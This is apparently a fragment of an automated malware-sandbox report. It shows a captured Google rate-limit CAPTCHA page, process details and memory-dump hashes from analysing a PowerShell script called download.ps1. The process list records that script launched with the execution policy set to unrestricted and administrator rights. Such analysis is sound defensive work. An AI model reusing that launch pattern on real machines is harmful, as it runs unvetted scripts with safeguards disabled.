                                                          Cookie: NID=520=cEoIAxjMoZ6MoW68jg49qCvrRMa0ViSx6xN20jBzhJeiEz3tcizlILgzAcNWZYjCzEeOfczwUdLkmSnraGstbyPWvKRY4BLH6ZxyeYSuz-t1QxzbHSKelk9W2dJ3fRsRHkE98yh2r97s7ODfTI2YXocag3sXOqL8kezGUaPUsHBEfBoGbcxKg7NugFxmHmacy3uh
                                                          Dec 27, 2024 14:39:10.553057909 CET1289INHTTP/1.1 429 Too Many Requests
                                                          Date: Fri, 27 Dec 2024 13:39:10 GMT
                                                          Pragma: no-cache
                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Content-Type: text/html
                                                          Server: HTTP server (unknown)
                                                          Content-Length: 3075
                                                          X-XSS-Protection: 0
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 66 6f 6e 74 2d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>http://www.google.com/</title></head><body style="font-family: arial, sans-serif; background-color: #fff; color: #000; padding:20px; font-size:18px; overscroll-behavior:contain;" onload="e=document.getElementById('captcha');if(e){e.focus();} if(solveSimpleChallenge) {solveSimpleChallenge(,);}"><div style="max-width:400px;"><hr noshade size="1" style="color:#ccc; background-color:#ccc;"><br><form id="captcha-form" action="index" method="post"><noscript><div style="font-size:13px;"> In order to continue, please enable javascript on your web browser.</div></noscript><script src="https://www.google.com/recaptcha/api.js" async defer></script><script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" dat
                                                          Dec 27, 2024 14:39:10.553082943 CET1289INData Raw: 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b
                                                          Data Ascii: a-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="0KhTLD_ZNNIgdznkxgj7MPDh2MP6weM3wsJix2k-MHtxkVV7mRJ9lpuJ8sr77jc1crTDUWkBW7jKz6_Ado2hDGyB2xl8PEIfQNjJkoBY_F3BbfAxkKHCgNuHgSREdMUir3osmoMeeEZm4p9J-TcgGCY
                                                          Dec 27, 2024 14:39:10.553364038 CET777INData Raw: 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74
                                                          Data Ascii: ervice</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>This traffic may have been sent by malicious software, a browser plug-in, or a s


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:08:39:04
                                                          Start date:27/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                          Imagebase:0x7ff7e6ab0000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:08:39:04
                                                          Start date:27/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7b5ff0000
                                                          File size:875'008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.137054895252.00007FFE555A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE555A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffe555a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: rxU
                                                            • API String ID: 0-719624857
                                                            • Opcode ID: eb38624e4dbbc647924ca22e3c5f4688ecc7dfd40ed4679236af7e844d269774
                                                            • Instruction ID: d9fc70a38f45b2bcf6555f8548f5fc7f9cab904bb360865050748c12294a58b1
                                                            • Opcode Fuzzy Hash: eb38624e4dbbc647924ca22e3c5f4688ecc7dfd40ed4679236af7e844d269774
                                                            • Instruction Fuzzy Hash: 84213935A18A4D8FDF98EF58C481EE9B7A1EF68704F1401A6D409D7296CA24EC82CBC0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.137054367175.00007FFE5548D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE5548D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffe5548d000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b68cba8fe913077ca8ffd2dbd40f5afaae7f67d0a4dfe898328ae5673c8b79b9
                                                            • Instruction ID: 4905bd3046186b099d87d92a75cbc39f5e43010c0b7370b52e02d8d0fa03af2f
                                                            • Opcode Fuzzy Hash: b68cba8fe913077ca8ffd2dbd40f5afaae7f67d0a4dfe898328ae5673c8b79b9
                                                            • Instruction Fuzzy Hash: 6511913150CF088F9BA8EF1DE4859623BE0FB98320B104AAFD549C7666D731E881CBC1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.137054895252.00007FFE555A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE555A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffe555a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac1e9a8728e0f9ecc1c852d4a2cf00cf3147211ef8222b0e4111f4497a7b5eb0
                                                            • Instruction ID: 4500614b78027f5a96b32940f789d4cc0d5c7b2ca45582898fc444eabe3e330a
                                                            • Opcode Fuzzy Hash: ac1e9a8728e0f9ecc1c852d4a2cf00cf3147211ef8222b0e4111f4497a7b5eb0
                                                            • Instruction Fuzzy Hash: 6601677111CB0C4FDB44EF0CE451AAAB7E0FB95324F10056EE58AC3661D636E892CB46
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.137058811559.00007FFE55850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE55850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffe55850000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ae12cd643c7e9fd65d166e8f73a467a7a45d335819fa7224a6f77a90cc3c61b
                                                            • Instruction ID: 673d4a7a843ba5ef8282c56de8e56c90bb0092fac1ca304367e12cb7051dbf74
                                                            • Opcode Fuzzy Hash: 7ae12cd643c7e9fd65d166e8f73a467a7a45d335819fa7224a6f77a90cc3c61b
                                                            • Instruction Fuzzy Hash: C0F05831A0C6088FDB58EB4CE4858A877E0EF45324B1801B6D249CB163DA2AEC05CB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.137058335156.00007FFE55810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE55810000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffe55810000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ed7fc297cfedb4579c6d7ed721dacb22e9ef3ecba7a59ec55c61aaf79de3f62
                                                            • Instruction ID: 236631822f4e2653769a3746bd3ebfc584a526da38ac9708e681ff676471e29c
                                                            • Opcode Fuzzy Hash: 3ed7fc297cfedb4579c6d7ed721dacb22e9ef3ecba7a59ec55c61aaf79de3f62
                                                            • Instruction Fuzzy Hash: 8FF0A030A0DA884FDB9DEB2C90547697BE1FBA9305F14076FE08EC3693CF6998448741